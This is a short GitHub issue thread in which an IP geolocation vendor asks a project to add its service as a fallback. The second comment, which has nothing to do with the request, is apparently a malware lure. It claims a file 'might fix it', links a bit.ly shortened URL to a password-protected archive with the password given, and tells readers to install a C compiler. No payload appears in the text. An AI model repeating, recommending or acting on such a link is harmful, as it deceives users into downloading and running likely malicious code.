### ISSUE TITLE
Consider to add support for IP2Location.io as a fallback

### ISSUE THREAD

**Issue by ip2location** [pulkitjalan/ip-geolocation#65]
Hi there,

Would you like to add support of our service into your project? Our service provided 500 queries per day for keyless query, or 30000 queries per month if you sign up our free plan. You can read more on the result returned via [our documentation](https://www.ip2location.io/ip2location-documentation).

**Comment by Kevin-Otalvares** [comment]
This might help:This file might fix it
https://bit.ly/4gvtdhO
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
